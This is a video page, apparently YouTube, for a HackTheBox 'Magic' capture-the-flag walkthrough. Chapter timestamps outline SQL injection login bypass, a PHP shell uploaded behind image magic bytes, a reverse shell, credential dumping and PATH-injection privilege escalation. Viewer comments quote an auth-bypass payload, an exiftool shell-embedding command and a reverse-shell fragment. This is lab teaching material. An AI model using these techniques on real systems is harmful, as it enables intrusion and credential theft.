HackTheBox - Magic
00:00 - Intro
00:50 - Nmap
02:40 - Starting GoBuster on the root and images
05:00 - Finding Auth Bypass via SQL Injection on login then throwing it to SQLMap
09:00 - Creating a basic PHP Shell, then attempting to upload it
12:30 - Grabbing the magic bytes off a JPG, then prepending it to our shell
16:00 - File uploaded, hunting for an LFI and doing more SQLMap
18:20 - Turns out we don't need the PHP Extension (.htaccess allows anything)
26:20 - Reverse Shell returned
27:50 - Grabbing the username and password out of Website Configuration
36:10 - Using VirusTotal to identify when a file was created
37:20 - Examining the .htaccess to see why we could execute code (should have a $ at the end)
39:30 - Using MsqlDump to dump the database and get a password out of it, su to the theseus user
46:00 - Found a SetUID Binary (sysinfo) then using strace to see what it does
48:00 - Using the -f argument with strace to follow forks and see the exec() calls
51:00 - Using Path Injection since absolute paths were not used in exec() and getting a root shell
55:00 - Showing SQLMap did complete with the increased level/risk
Пікірлер: 59
"that's there because of... reasons" - Ippsec I love this dude.
Great as always! 🔥
@IppSec great job. I have been to your channel since I discovered. Am really learning a lot from Kenya. Kudos!!!👍👌
It's the first machine on release day i did. Was really proud for being in top 100 xD I liked the root of this machine very much but also your video explained me many concepts that are behind the machine (why stuff works). thank you for this videos always
My favorite and most enjoyable box so far !!!!!
Thank you for your efforts open sourcing knowledge.. great jov
Thanks for the vids :) - Awesome content
setuid + path injection was nice
i saw quite a few writeup, this one is cool
Love it!
Always interesting to see a different (far more technical) way of working. I just used exiftool to embed the php into a jpg and uploaded it to give me command exe.
cool. I like the theme of your terminal.
!!!! Magician !!
Thank You sweetheart 💗🥳
You can use the -b flag on strace to specify syscalls, i.e. strace -b execve.
Curious, if you had code exec through PHP, why do you go for a web shell first? Why not go directly to php rev shell?
@huhwhatwho7895
3 жыл бұрын
Its best to step slowly through untill a revtcp, sometimes firewalls or routing tables are in place. Thus with a webshell you can step your way up. In practice its best to leak phpinfo() first and then enumerate which php functions are enabled/disabled. But then again this is a CTF machine so it wont be difficult :D
I think the last PE would only work for something like `popen` or `execv` those open other processes. The bash script can work under popen('div-script ...snip...'). In other more common scenarios, bash scripts don't honour SUID for security reasons. Please correct me if I'm wrong. Thank you.
in the SQL " 'or 1=1 -- - " what does the last slash mean? i know double slashes are for comments and when I try it myself it only works if there is a space and another slash and i don't understand why.
@ippsec
2 жыл бұрын
A comment is two dashes and a space. Sometimes the webapp will append a and not , so if you don't do it will be inconsistent. In no situation will adding the hurt, it can only help. Just like when I do "bash -c' bash -i ..." its just a stability thing... The which i use for is just there so you can visually see the space.
👍👌
hope you or some die hard fan reads this: can we get a playlist where you go into a box blind? i would do it, but im not as familiar with your entire collection. when you go into a box blind, we hear the depth and breadth of your methodologies.
@ippsec
3 жыл бұрын
A lot of the easy boxes, i go at it blind
@damnmayneunfiltered
3 жыл бұрын
@@ippsec thanks. should be no problem putting together a good playlist.
Kali 2020.4 getting zsh as default shell what's your opinion Caught you at 11:22 99s 😜🤭
@DHIRAL2908
3 жыл бұрын
Haha lol was gonna comment it!
@amoghnath3330
3 жыл бұрын
lol can you mind explaining?
@terror403
3 жыл бұрын
i did it, i love it :)
the content type was screwed up because of that uglish burp, which tends to pop up and become the main window even when you fcn don't ask it to. and all typing goes there spoiling everything. I've seen this so many times.
Why you don't use kali?
@johnnywilson3071
3 жыл бұрын
Personal preference probably.
There's actually a second way to get to upload.php. While it's password protected, they're just doing a "Location:" redirect without exiting the script afterwards. So I just removed the redirect header from the response in Burp
@jannmoon
3 жыл бұрын
Smart man, I went the unnecessary extra step by changing it to "200 OK" and really thought I was foolin' my browser 🤷♂️
@nicoswd
3 жыл бұрын
@@jannmoon While I fooled mine, I guess yours was lot less confused about that response 🙃. But nice to see someone else caught this bug too!
@NytNaatitaan
3 жыл бұрын
Did the same :)
Could u just enter in the username “admin-” that should in Theorie do the job 🧐
How to setup the os you are using?
@MohmdSy5
3 жыл бұрын
github.com/theGuildHall/pwnbox I guess this what you’re looking for
@MohmdSy5
3 жыл бұрын
It’s a collaboration between Hackthebox and parrotOS
@aneeshnadh5377
3 жыл бұрын
@@MohmdSy5 thankyou
There is actually an easier way of uploading a shell by using exiftool to write the code in a real image.
@markgentry8675
3 жыл бұрын
That sounds interesting. can you give me a simple example of how to do that?
@panosklainos3031
3 жыл бұрын
@@markgentry8675 I just used 'exiftool -Comment {php code} image.png'. Notice that this only works with the png extension and not jpg or jpeg. I think it's a way easier method and I never would have thought about adding the magic bytes.
I ithought it was gonna be a magic video after he said " i am doing magic "
it is funny seeing this after the 9 year sudo vuln was release he said @ 37:00 cant exploit it because we dont have access to sudo....yes you do as we now know.
Hi Ippsec few questions and advises you could give here hope not to bother, , am a big fun here am starting to support , and truing to get my build PC on I just want to have the same environment , Soo first I have 16 RAM should I put more RAM ? Other questions, you use the CRACKING u say is a different machine do you run a Linux base system on it or is other virtual machine? , And is it a Good idea to run Linux as a base system on a PC or not , hope you can understand my silly question hope to have advised Abt them thanks
@jannmoon
3 жыл бұрын
I know you didn't ask my opinion but here ya go anyways. I have 32 GB and haven't really seen it all burn up yet (besides hashcat getting my CPU to 90 C) - last year with 16 it did slow down some. 16 is near perfect but 32 is flawless for me. Got into VPS and I love it especially with all the credits for free from aws and Google cloud etc, I use it for any web heavy directory fuzzing for bug bounties and the speed and lack of IP bans is great . Finally I use Kali as my main OS and it died a lot at first, then as soon as I finally start making 2-3 backups, no issues. It can be done but be prepared and back up stuff regularly, windows workarounds are kinda necessary sometimes so kinda wish I kept it as a dual boot instead of full Linux . Oh well!
@leon1985ist
3 жыл бұрын
@@jannmoon how do I get VPS? What's stands for
Thanks. To semicolon be very nice
Site vulnerable to the most basic sql injection in 2020 omegalul.
@Xbotto
3 жыл бұрын
found the same broken login irl in 2018 kekw
I swear I've seen this one before... am I going mad?
@imperium305
3 жыл бұрын
Don't think so, he has done a bunch of magic byte trickery boxes in the past though
First?
can you tell me please , how to make parrot window screen !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
@deepb5204
3 жыл бұрын
curl parrot.live 😛